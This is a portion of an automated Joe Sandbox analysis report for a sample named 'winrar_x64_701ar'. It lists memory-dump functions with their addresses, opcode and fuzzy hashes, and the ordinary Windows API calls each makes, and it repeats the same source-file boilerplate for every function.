Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2150a2774044c36f79e81eacf1206554ea999062c49d9c81a4d9e38c8f448f
Instruction ID: 5ea34187da0139da5fc7a24f99caab0d53f41009c719d90cedbcf800bfc60e1b
Opcode Fuzzy Hash: 7d2150a2774044c36f79e81eacf1206554ea999062c49d9c81a4d9e38c8f448f
Instruction Fuzzy Hash: B3B1A072A08B4585EB749F29E05263C7BA0F76AF49F240136DACEAB395CF79D841D700

Function 00007FF6C3B9A1EC Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f706961199820fe2e345934f27a80a7d546ce3fac6a5e6cdcb32fc393c353f
Instruction ID: 92f4e9b7c31fc6bf6647ea0cbdd512246a4b40c3dcbd69c5095322ccca6d9346
Opcode Fuzzy Hash: b0f706961199820fe2e345934f27a80a7d546ce3fac6a5e6cdcb32fc393c353f
Instruction Fuzzy Hash: CD91E362B0868596EB11DF28D492AFD6720FB76789F401031EFCEA7655EE38E606C700

Function 00007FF6C3BC83C0 Relevance: .2, Instructions: 198COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa021549f167e7e5cc87e9c9d49059b1c09a6111a41a30a90789b7ea67b7d5a
Instruction ID: 5845221e9bedcd8b5ff3e2bdf2a5cdc0d72255bbab5d1a67819952187deb2960
Opcode Fuzzy Hash: 2fa021549f167e7e5cc87e9c9d49059b1c09a6111a41a30a90789b7ea67b7d5a
Instruction Fuzzy Hash: 76810372A0C78146E774DF19B442BBA6A91FBA6795F104235DADDD3B99CF3DD4008B00

Function 00007FF6C3BAF04C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e31a6035892512d2e65542796294bf3a2570c16e9c5f3301be95f86c12f48a
Instruction ID: 48f907b027d14284acf7fa77c6e0f488e2153723f193d88cdafc0c46eeac9c1c
Opcode Fuzzy Hash: f7e31a6035892512d2e65542796294bf3a2570c16e9c5f3301be95f86c12f48a
Instruction Fuzzy Hash: 75711666F1CA8246FB209E64C943FFD6A409F33386F500135DACDB7A86CE2DE5458B21

Function 00007FF6C3BB1CE8 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Release$CapsDevice
String ID:
API String ID: 4264324914-0
Opcode ID: 3a1d2e963bde79d909154999737d0a965b206215952730fa3e8ac6139a674311
Instruction ID: d085d2db89323b62539e37710cc85787b3380c964277f163652a04e964935c54
Opcode Fuzzy Hash: 3a1d2e963bde79d909154999737d0a965b206215952730fa3e8ac6139a674311
Instruction Fuzzy Hash: 7F813E36B18A0586EB10CF6AE481AAC7771FB99B9AF014132DECDA7768CF38D545C740

Function 00007FF6C3BA7FC8 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f87da3c21ac6c3b6ad54b5c00a067e824c395104bfcccc05a58fdc758abbda
Instruction ID: 73624e2ede90ca2a97822fd574339864b1fc6e9c7c9ed7db0e2fc11610780f46
Opcode Fuzzy Hash: 08f87da3c21ac6c3b6ad54b5c00a067e824c395104bfcccc05a58fdc758abbda
Instruction Fuzzy Hash: AF612322B185D159EB11CF7485018FD7FB1E72A789B458032CEDAE7A46CE3CE506CB50

Function 00007FF6C3BC1574 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: d128696c40fcf46d6c5f1ae26051c2bb1bde6dcfa6e4398596c430d84429af2a
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: E7518676A1865186E7349F29E04563833A1EB66B59F284131CECDB77D5CF3AE843C780

Function 00007FF6C3BC1984 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 1fdc28daf75f1ae147ebfec3f8ff514c29d005183ec6d725247b1f7b72b318e8
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 40517676A18A5186E7349F29E04263833A0EB66B59F244131DEDDB7794DF3AEC43C780

Function 00007FF6C3BC1D94 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: ac9ec91b088c8e291e560a68248f5ddf5a640278598f59d06806ffc801fca279
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: E4518336A1865682E7749F29E04163833A0EB66B59F244131DACDB7795CF3AE853C7C0

Function 00007FF6C3BC1370 Relevance: .1, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 4a41ccf2de89696428198a37b2d089e208e141e861c082964e124d1692e63cfa
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: DD51C532A1865182E7349F29E041A7C33A1EBA6B59F244131CECDB7795CF3AE953C780

Function 00007FF6C3BC1780 Relevance: .1, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 24d6475dbd0fb55a54396731853e9bae4fc49cb3574ab8f65d498a098d704247
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 7C51A376A1865186E7349F29E041A3837A1EB66F59F244131CECDB7794CF3AE853C780

Function 00007FF6C3BC1B90 Relevance: .1, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 8e23d896bd3dba5133a8b73e916617aaf9649f8d8f2d76821af52afa9e0c9978
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: E451B936A18A5181E7349F29E05263937A0EB66B59F244131DECCBB794CF3AEC53C780

Function 00007FF6C3BA94DC Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f3cd2992c65023a5ea7fc19f0cefddf71d6570bb4a6a01ba758df2379e2081
Instruction ID: d9da79dd38dddca8e2dfe47245d95d34d1049a5f871c0dca9eebfbf469a2b896
Opcode Fuzzy Hash: f9f3cd2992c65023a5ea7fc19f0cefddf71d6570bb4a6a01ba758df2379e2081
Instruction Fuzzy Hash: BF518E37B286908BD764CF25E401A9E73A5F388798F045125EE8A93B09CF3DE945CF40

Function 00007FF6C3BAF9B0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6811fcd408ba071b51ec3c3de7f24f7e70c53c52c855f7db162867a8702698ae
Instruction ID: 36797051847d251dc6cd466f70839f4b5dc06ab8ba134f36b07113463b6c85f4
Opcode Fuzzy Hash: 6811fcd408ba071b51ec3c3de7f24f7e70c53c52c855f7db162867a8702698ae
Instruction Fuzzy Hash: 70514473B184514BE7288F28D816BFD77A1F7A1B4AF444131DAC987688DE3DD941CB10

Function 00007FF6C3BC65C0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 321a00be8216ab1d5a6abf96824688860184d35458da0e7affeca5d9c463e6b8
Instruction ID: e338fac85a9d8c6540e628fee73bb275c6fda0bdc569ccea082774b02056a389
Opcode Fuzzy Hash: 321a00be8216ab1d5a6abf96824688860184d35458da0e7affeca5d9c463e6b8
Instruction Fuzzy Hash: 30412322714A5582EF14CF2AE9169A973A1BB59FD1B099037EECDE7B58DF3CC0468340

Function 00007FF6C3BAEEF0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cdc14705774243d19fb94633146f393bab702cd26d035aadc90ecda4019bf39
Instruction ID: abf9be2e19bcef5a7b919ec35dd1d34a9e0172154c1086c79c64397b4a554be8
Opcode Fuzzy Hash: 8cdc14705774243d19fb94633146f393bab702cd26d035aadc90ecda4019bf39
Instruction Fuzzy Hash: C93109A2A08D424BE719DE16E9926BE7791F756385F008039DFCAD7B41CE3CE041C710

Function 00007FF6C3BD1230 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e43b1bc40d61511b3b7f06c5c35b64dd774a12cb547e535d3d7b0db56cddfc01
Instruction ID: 06e183b032749d6b28c27dedda6dcc2a1b1ffb3851599c375907def81ed92117
Opcode Fuzzy Hash: e43b1bc40d61511b3b7f06c5c35b64dd774a12cb547e535d3d7b0db56cddfc01
Instruction Fuzzy Hash: 64F062B1B286958ADFE5CF2DA883A6977D0E718381F908179D6CDD3B14DA3CD0608F48

Function 00007FF6C3BBA354 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b26cc2c670222ae876159ff5603c0af37539fb50017e4d91ac7b3a384edc0ce7
Instruction ID: 4cd74ea16f49255ea9c97ac113279f7a12b64724dbc0a6169405bce04a3a7bc8
Opcode Fuzzy Hash: b26cc2c670222ae876159ff5603c0af37539fb50017e4d91ac7b3a384edc0ce7
Instruction Fuzzy Hash: 7CA00121948802E8E6448F14A8928706330BB62316B900031E4CDA54A49E3CA605C214

Function 00007FF6C3BB99C0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF6C3BB99D6
GetModuleHandleW.KERNEL32 ref: 00007FF6C3BB99E3
GetModuleHandleW.KERNEL32 ref: 00007FF6C3BB99F8
GetProcAddress.KERNEL32 ref: 00007FF6C3BB9A10
GetProcAddress.KERNEL32 ref: 00007FF6C3BB9A23
CreateEventW.KERNEL32 ref: 00007FF6C3BB9A4F
DeleteCriticalSection.KERNEL32 ref: 00007FF6C3BB9A9B
CloseHandle.KERNEL32 ref: 00007FF6C3BB9AAD

Strings

<pi-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF6C3BB99DC
kernel32.dll, xrefs: 00007FF6C3BB99F1
SleepConditionVariableCS, xrefs: 00007FF6C3BB9A06
WakeAllConditionVariable, xrefs: 00007FF6C3BB9A16

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: <pi-ms-win-core-synch-l1-2-0.dll$SleepConditionVariableCS$WakeAllConditionVariable$kernel32.dll
API String ID: 2565136772-369236946
Opcode ID: e0361d743c454d09e960a600f16381c646ca90098b4fa54283586941770b61f3
Instruction ID: 4bc434e10e94eb86c675621c430c3b3555ed4116df18f439027b34cd3c657c94
Opcode Fuzzy Hash: e0361d743c454d09e960a600f16381c646ca90098b4fa54283586941770b61f3
Instruction Fuzzy Hash: 0F211920E1AA0796FE549F15F89797477A0AF76B46F880074C9CEE66A8EE3CA4458700

Function 00007FF6C3BB30D4 Relevance: 16.6, APIs: 11, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3BB28E8: PeekMessageW.USER32 ref: 00007FF6C3BB28FE
Part of subcall function 00007FF6C3BB28E8: GetMessageW.USER32 ref: 00007FF6C3BB2915
Part of subcall function 00007FF6C3BB28E8: IsDialogMessageW.USER32 ref: 00007FF6C3BB292C
Part of subcall function 00007FF6C3BB28E8: TranslateMessage.USER32 ref: 00007FF6C3BB293B
Part of subcall function 00007FF6C3BB28E8: DispatchMessageW.USER32 ref: 00007FF6C3BB2946

GetDlgItem.USER32 ref: 00007FF6C3BB3113
ShowWindow.USER32 ref: 00007FF6C3BB3132
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB3147
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB315F
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB3180
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB319C
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB31DF
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB31FB
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB320F
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB3239
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB3251

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 4119318379-0
Opcode ID: 3a491d4ebbf2339c45bbe37badbdbcf07a2e33b8dd11d847ba04a74795a07cc1
Instruction ID: e3974a658168e113b9ab0e64e57bbc5abd153f5467e66076cc4e1550eeeae55c
Opcode Fuzzy Hash: 3a491d4ebbf2339c45bbe37badbdbcf07a2e33b8dd11d847ba04a74795a07cc1
